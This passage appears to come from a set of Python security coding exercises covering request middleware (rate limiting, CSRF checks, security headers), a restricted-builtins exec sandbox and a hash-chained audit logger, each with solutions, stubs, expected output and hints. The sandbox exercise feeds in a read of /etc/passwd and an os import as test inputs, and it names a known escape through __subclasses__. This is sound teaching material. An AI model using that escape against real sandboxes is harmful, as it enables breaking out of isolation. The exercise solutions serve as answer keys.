    buckets: dict[str, dict] = {}
    rate = 2.0  # tokens refilled per second

    def handler(req: Request) -> Response:
        now = time.monotonic()
        ip = req.client_ip
        if ip not in buckets:
            buckets[ip] = {'tokens': float(capacity), 'last': now}
        b = buckets[ip]
        # Refill for the elapsed time, capped at capacity.
        b['tokens'] = min(capacity, b['tokens'] + (now - b['last']) * rate)
        b['last'] = now
        if b['tokens'] < 1:
            return Response(429, 'Too Many Requests')
        b['tokens'] -= 1
        return next_handler(req)
    return handler


def csrf_middleware(next_handler: Handler, valid_tokens: set[str]) -> Handler:
    """Require a valid ``X-CSRF-Token`` header on state-changing methods.

    GET, HEAD and OPTIONS pass through unchecked; any other method gets a
    403 unless its token is in ``valid_tokens``.
    """
    SAFE_METHODS = {'GET', 'HEAD', 'OPTIONS'}

    def handler(req: Request) -> Response:
        if req.method.upper() in SAFE_METHODS:
            return next_handler(req)
        token = req.headers.get('X-CSRF-Token')
        # A missing header yields None, which is never in the set.
        if token not in valid_tokens:
            return Response(403, 'CSRF token missing or invalid')
        return next_handler(req)
    return handler


def compose_middleware(handler: Handler, middlewares: list) -> Handler:
    """Wrap ``handler`` so the first middleware in the list is outermost."""
    for mw in reversed(middlewares):
        handler = mw(handler)
    return handler


def app(req: Request) -> Response:
    """Core handler: always answers 200 with a greeting for the path."""
    return Response(200, f"Hello from {req.path}")


valid_csrf = {'csrf-token-abc123'}

pipeline = compose_middleware(app, [
    security_headers_middleware,
    rate_limit_middleware,
    lambda h: csrf_middleware(h, valid_csrf),
])

resp = pipeline(Request('GET', '/api/data', {}))
print(f"GET status: {resp.status}")
print(f"security header present: {'X-Frame-Options' in resp.headers}")

resp = pipeline(Request('POST', '/api/data', {}, body='name=alice'))
print(f"POST no csrf: {resp.status}")

resp = pipeline(Request('POST', '/api/data', {'X-CSRF-Token': 'csrf-token-abc123'}, body='name=alice'))
print(f"POST with csrf: {resp.status}")

Middleware ordering matters: Security headers go outermost (they wrap every response including 429/403 from inner layers). Rate limiting goes before CSRF check — this prevents DoS via repeated CSRF failures. CSRF goes innermost (closest to the app) — only state-changing routes need it. In FastAPI/Starlette, this is implemented with @app.middleware("http") or Middleware(...) class.

from dataclasses import dataclass, field
from typing import Callable, Optional
import time

@dataclass
class Request:
  """Minimal request object passed through the middleware chain."""
  method: str                     # HTTP method; csrf_middleware exempts GET/HEAD/OPTIONS
  path: str                       # echoed back in the body by `app`
  headers: dict[str, str]         # request headers, e.g. 'X-CSRF-Token'
  body: str = ''
  client_ip: str = '127.0.0.1'    # key for the per-IP rate-limit bucket

@dataclass
class Response:
  """Minimal response object returned by handlers and middleware."""
  status: int                     # HTTP status code (200, 403, 429 in this file)
  body: str
  # default_factory gives every Response its own dict, so headers added by
  # security_headers_middleware are not shared between responses.
  headers: dict[str, str] = field(default_factory=dict)

Handler = Callable[[Request], Response]

def security_headers_middleware(next_handler: Handler) -> Handler:
    """Return a handler that stamps the security headers on every response."""
    hardening = {
        'X-Content-Type-Options': 'nosniff',
        'X-Frame-Options': 'DENY',
        'Strict-Transport-Security': 'max-age=31536000',
    }

    def handler(req: Request) -> Response:
        response = next_handler(req)
        # Overwrites any value an inner layer already set for these headers.
        for header_name, header_value in hardening.items():
            response.headers[header_name] = header_value
        return response

    return handler

def rate_limit_middleware(next_handler: Handler, capacity: int = 5) -> Handler:
    """Per-IP token bucket kept in a closure; replies 429 when a bucket is empty."""
    rate = 2.0  # tokens/sec
    buckets: dict[str, dict] = {}

    def handler(req: Request) -> Response:
        now = time.monotonic()
        # First request from an IP starts with a full bucket.
        bucket = buckets.setdefault(
            req.client_ip, {'tokens': float(capacity), 'last': now}
        )
        elapsed = now - bucket['last']
        bucket['tokens'] = min(capacity, bucket['tokens'] + elapsed * rate)
        bucket['last'] = now
        if bucket['tokens'] < 1:
            return Response(429, 'Too Many Requests')
        bucket['tokens'] -= 1
        return next_handler(req)

    return handler

def csrf_middleware(next_handler: Handler, valid_tokens: set[str]) -> Handler:
  """
  For state-changing methods (POST/PUT/DELETE/PATCH),
  require X-CSRF-Token header to be in valid_tokens.
  GET/HEAD/OPTIONS are exempt.

  Exercise stub: the inner handler is intentionally left for the reader,
  so as written it returns None for every request.
  """
  def handler(req: Request) -> Response:
      pass  # implement this
  return handler

def compose_middleware(handler: Handler, middlewares: list) -> Handler:
    """Wrap handler with each middleware, last to first, so index 0 ends up outermost."""
    wrapped = handler
    for index in range(len(middlewares) - 1, -1, -1):
        wrapped = middlewares[index](wrapped)
    return wrapped

# Core handler
def app(req: Request) -> Response:
  """Innermost handler: answer every request with 200 and a greeting naming its path."""
  greeting = f"Hello from {req.path}"
  return Response(200, greeting)

# Tokens the CSRF layer accepts in the X-CSRF-Token header.
valid_csrf = {'csrf-token-abc123'}

# First entry is outermost: security headers -> rate limit -> CSRF -> app.
# csrf_middleware needs a second argument, so a lambda adapts it to the
# one-argument call that compose_middleware makes.
pipeline = compose_middleware(app, [
  security_headers_middleware,
  rate_limit_middleware,
  lambda h: csrf_middleware(h, valid_csrf),
])

# Valid GET — should pass through (expected status 200, with security headers)
resp = pipeline(Request('GET', '/api/data', {}))
print(f"GET status: {resp.status}")
print(f"security header present: {'X-Frame-Options' in resp.headers}")

# POST without CSRF token (expected status 403)
resp = pipeline(Request('POST', '/api/data', {}, body='name=alice'))
print(f"POST no csrf: {resp.status}")

# POST with valid CSRF token (expected status 200)
resp = pipeline(Request('POST', '/api/data', {'X-CSRF-Token': 'csrf-token-abc123'}, body='name=alice'))
print(f"POST with csrf: {resp.status}")
Expected Output
GET status: 200
security header present: True
POST no csrf: 403
POST with csrf: 200
Hints

Hint 1: SAFE_METHODS = {"GET", "HEAD", "OPTIONS"} — call next_handler directly for these.

Hint 2: For other methods, check req.headers.get("X-CSRF-Token") against valid_tokens.

Hint 3: Return Response(403, "CSRF token missing or invalid") if the token is absent or not in the set.


#10 Sandbox exec with Restricted Builtins — Hard
Tags: sandbox, exec, restricted-builtins, security

Implement a sandboxed exec wrapper that restricts available builtins to a safe subset, blocking file system and import access.

Solution
SAFE_BUILTINS = {
'print': print,
'range': range,
'len': len,
'int': int,
'str': str,
'float': float,
'list': list,
'dict': dict,
'tuple': tuple,
'set': set,
'abs': abs,
'min': min,
'max': max,
'sum': sum,
'enumerate': enumerate,
'zip': zip,
'sorted': sorted,
'reversed': reversed,
'isinstance': isinstance,
'bool': bool,
}

def sandboxed_exec(code: str, user_globals: dict | None = None) -> dict:
safe_globals = {'__builtins__': SAFE_BUILTINS}
if user_globals:
safe_globals.update(user_globals)
local_ns: dict = {}
exec(code, safe_globals, local_ns)
return local_ns

# Safe code runs normally: prints 45 and leaves x in the returned namespace.
result = sandboxed_exec("x = sum(range(10))\nprint(x)")
print(f"safe code result: {result.get('x')}")

# open is not in the allow-list, so the lookup fails with NameError.
try:
    sandboxed_exec("f = open('/etc/passwd')")
    print("open not blocked!")
except NameError:
    print("open blocked: True")

# __import__ is not in the allow-list either.
try:
    sandboxed_exec("os = __import__('os')")
    print("import not blocked!")
except NameError:
    print("import blocked: True")

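Why this is not production-safe: Python objects carry references to their class and, through it, to the rest of the interpreter. A resourceful attacker can walk the object graph without using any builtin: ().__class__.__bases__[0].__subclasses__() lists every class currently loaded, and that list usually contains something dangerous — subprocess.Popen if subprocess has been imported anywhere in the process, or a class whose methods expose the real builtins through __globals__. Real isolation requires OS-level sandboxing: seccomp filters (Docker, gVisor) or a separate process constrained with setrlimit. A purpose-built evaluator like RestrictedPython restricts the language itself and is best combined with those measures. Use this pattern only for trusted-ish user scripts with a known threat model.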

# WARNING: Python sandboxing via restricted __builtins__ is NOT production-safe.
# A determined attacker can escape it. Use subprocess isolation or gVisor for real sandboxing.
# This exercise teaches the CONCEPT and common bypass vectors.

SAFE_BUILTINS = {
  'print': print,
  'range': range,
  'len': len,
  'int': int,
  'str': str,
  'float': float,
  'list': list,
  'dict': dict,
  'tuple': tuple,
  'set': set,
  'abs': abs,
  'min': min,
  'max': max,
  'sum': sum,
  'enumerate': enumerate,
  'zip': zip,
  'sorted': sorted,
  'reversed': reversed,
  'isinstance': isinstance,
  'bool': bool,
}

def sandboxed_exec(code: str, user_globals: dict | None = None) -> dict:
  """
  Execute code with restricted builtins.
  Return the local namespace after execution.
  Raise RuntimeError if the code attempts to use a forbidden builtin.
  """
  safe_globals = {'__builtins__': SAFE_BUILTINS}
  if user_globals:
      safe_globals.update(user_globals)
  local_ns: dict = {}
  exec(code, safe_globals, local_ns)
  return local_ns

# Safe code should work: prints 45 and leaves x in the returned namespace.
# The two statements are separated by an escaped newline inside one literal.
result = sandboxed_exec("x = sum(range(10))\nprint(x)")
print(f"safe code result: {result.get('x')}")

# Attempt to use open() — should fail (open is not in the allow-list, so the
# lookup raises NameError)
try:
  sandboxed_exec("f = open('/etc/passwd')")
  print("open not blocked!")
except NameError:
  print("open blocked: True")

# Attempt to use __import__ — should fail for the same reason
try:
  sandboxed_exec("os = __import__('os')")
  print("import not blocked!")
except NameError:
  print("import blocked: True")
Expected Output
45
safe code result: 45
open blocked: True
import blocked: True
Hints

Hint 1: Pass {"__builtins__": SAFE_BUILTINS} as the globals dict to exec() — this replaces the full builtins module.

Hint 2: open() and __import__ are not in SAFE_BUILTINS, so accessing them raises NameError.

Hint 3: The sandboxed code runs in local_ns but reads globals from safe_globals — keep them separate.


#11 Security Audit Logger — Hard
Tags: audit-log, logging, security-events, soc2, compliance

Build a tamper-evident audit logger with hash-chaining, structured events, and flexible querying.

Solution
import time
import json
import hashlib
from dataclasses import dataclass, field, asdict
from typing import Optional
from copy import deepcopy

@dataclass
class AuditEvent:
    """
    One structured audit record.

    The caller supplies event_type, actor, resource and outcome (plus,
    optionally, timestamp and details). event_id and chain_hash are
    assigned by AuditLogger.log().
    """
    event_type: str
    actor: str
    resource: str
    outcome: str
    timestamp: float = field(default_factory=time.time)
    details: dict = field(default_factory=dict)
    event_id: str = ''
    chain_hash: str = ''


class AuditLogger:
    """
    In-memory audit log with sequential IDs and a SHA-256 hash chain.

    Each stored event's chain_hash covers the JSON of the previous stored
    event (or the literal 'GENESIS' for the first one) followed by the JSON
    of the event itself without its chain_hash field. Changing any stored
    event therefore breaks verification from that event onwards.
    """

    def __init__(self) -> None:
        self._events: list[AuditEvent] = []
        self._counter = 0

    def _event_to_json(self, event: AuditEvent, include_chain_hash: bool = True) -> str:
        """Serialise an event to JSON with sorted keys, optionally dropping chain_hash."""
        payload = asdict(event)
        if not include_chain_hash:
            payload.pop('chain_hash', None)
        return json.dumps(payload, sort_keys=True)

    def _chain_hash(self, previous: Optional[AuditEvent], event: AuditEvent) -> str:
        """Return the hash linking `event` to `previous` (None means first event)."""
        prev_json = 'GENESIS' if previous is None else self._event_to_json(previous)
        current_json = self._event_to_json(event, include_chain_hash=False)
        return hashlib.sha256((prev_json + current_json).encode()).hexdigest()

    def log(self, event: AuditEvent) -> AuditEvent:
        """
        Assign event_id and chain_hash to `event`, store a copy, and return `event`.

        The passed-in object is updated in place; the log keeps its own deep
        copy, so later changes to the caller's object do not affect the chain.

        Raises:
            TypeError: if event.details holds values json cannot serialise.
                In that case nothing is stored and no ID is consumed.
        """
        next_number = self._counter + 1
        event.event_id = f"EVT-{next_number:04d}"
        event.timestamp = event.timestamp or time.time()

        previous = self._events[-1] if self._events else None
        event.chain_hash = self._chain_hash(previous, event)

        self._events.append(deepcopy(event))
        # Advance the counter only after the event is safely stored.
        self._counter = next_number
        return event

    def query(
        self,
        actor: Optional[str] = None,
        event_type: Optional[str] = None,
        outcome: Optional[str] = None,
    ) -> list[AuditEvent]:
        """
        Return events matching all provided filters (AND logic), in log order.

        A filter left as None is ignored; with no filters every event is
        returned. The result is a new list of copies, so callers cannot
        alter or remove stored events through it.
        """
        matches = [
            stored for stored in self._events
            if (actor is None or stored.actor == actor)
            and (event_type is None or stored.event_type == event_type)
            and (outcome is None or stored.outcome == outcome)
        ]
        return deepcopy(matches)

    def verify_chain(self) -> bool:
        """Recompute every chain_hash in order; return False at the first mismatch."""
        previous: Optional[AuditEvent] = None
        for stored in self._events:
            if stored.chain_hash != self._chain_hash(previous, stored):
                return False
            previous = stored
        return True

# Demo: record four events, then exercise the filters and the chain check.
logger = AuditLogger()

logger.log(AuditEvent('auth.login', 'alice', '/login', 'success'))
logger.log(AuditEvent('data.read', 'alice', '/api/users', 'success'))
logger.log(AuditEvent('auth.login', 'bob', '/login', 'failure', details={'reason': 'bad password'}))
logger.log(AuditEvent('admin.delete','alice', '/api/users/5','denied'))

# Expected: 4 events in total, 3 by alice, 1 failure, chain intact.
print(f"total events: {len(logger.query())}")
print(f"alice events: {len(logger.query(actor='alice'))}")
print(f"failures: {len(logger.query(outcome='failure'))}")
print(f"chain intact: {logger.verify_chain()}")

Audit logs and compliance: SOC 2 Type II, PCI-DSS, and HIPAA all require immutable audit trails. Hash-chaining means that even a database admin who can modify records cannot change a historical event without invalidating every subsequent hash — making the tampering detectable. Production audit systems (AWS CloudTrail, Google Cloud Audit Logs) use this pattern with additional signing (asymmetric keys) to prove provenance.

import time
import json
import hashlib
from dataclasses import dataclass, field, asdict
from typing import Optional

@dataclass
class AuditEvent:
  """
  One structured audit record.

  The caller supplies the first four fields (and optionally timestamp and
  details); event_id and chain_hash start empty and are meant to be filled
  in by the logger.
  """
  event_type: str          # e.g. 'auth.login', 'data.read', 'admin.delete'
  actor: str               # user/service that performed the action
  resource: str            # what was acted on
  outcome: str             # 'success' | 'failure' | 'denied'
  timestamp: float = field(default_factory=time.time)  # defaults to time.time() at creation
  details: dict = field(default_factory=dict)          # optional extra context, e.g. {'reason': 'bad password'}
  event_id: str = ''       # filled by logger
  chain_hash: str = ''     # hash linking to previous event (tamper evidence)

class AuditLogger:
  """
  Immutable audit log with:
  - Sequential event IDs
  - Hash-chaining (each event includes hash of previous) for tamper evidence
  - Structured JSON output
  - Query by actor, event_type, outcome

  Exercise stub: log(), query() and verify_chain() are intentionally left
  unimplemented and currently return None.
  """

  def __init__(self) -> None:
      # Stored events in the order they were logged.
      self._events: list[AuditEvent] = []
      # Number of events logged so far; source of the sequential event IDs.
      self._counter = 0

  def log(self, event: AuditEvent) -> AuditEvent:
      """
      Assign event_id, compute chain_hash, append to log.
      chain_hash = sha256(previous_event_json + current_event_json_without_hash)
      For the first event, previous_event_json = 'GENESIS'.

      event_id is a zero-padded counter string such as "EVT-0001".
      """
      # TODO(exercise): implement as described in the docstring.
      pass

  def query(
      self,
      actor: Optional[str] = None,
      event_type: Optional[str] = None,
      outcome: Optional[str] = None,
  ) -> list[AuditEvent]:
      """Return events matching all provided filters (AND logic)."""
      # TODO(exercise): a filter left as None is not applied; the demo
      # expects query() with no arguments to return every logged event.
      pass

  def verify_chain(self) -> bool:
      """Re-compute each chain_hash and verify the chain is intact."""
      # TODO(exercise): compare each recomputed hash with the stored one and
      # return False on any mismatch.
      pass

# Demo: record four events, then exercise the filters and the chain check.
logger = AuditLogger()

logger.log(AuditEvent('auth.login',  'alice', '/login',      'success'))
logger.log(AuditEvent('data.read',   'alice', '/api/users',  'success'))
logger.log(AuditEvent('auth.login',  'bob',   '/login',      'failure', details={'reason': 'bad password'}))
logger.log(AuditEvent('admin.delete','alice', '/api/users/5','denied'))

# Expected once AuditLogger is implemented: 4 events in total, 3 by alice,
# 1 failure, chain intact.
print(f"total events: {len(logger.query())}")
print(f"alice events: {len(logger.query(actor='alice'))}")
print(f"failures: {len(logger.query(outcome='failure'))}")
print(f"chain intact: {logger.verify_chain()}")
Expected Output
total events: 4
alice events: 3
failures: 1
chain intact: True
Hints

Hint 1: Assign event_id as a zero-padded counter string like "EVT-0001".

Hint 2: For chain_hash: serialize the previous event to JSON, concatenate with current event fields (excluding chain_hash), then sha256.

Hint 3: verify_chain() re-computes each hash and compares to stored — any mismatch returns False.

© 2026 EngineersOfAI. All rights reserved.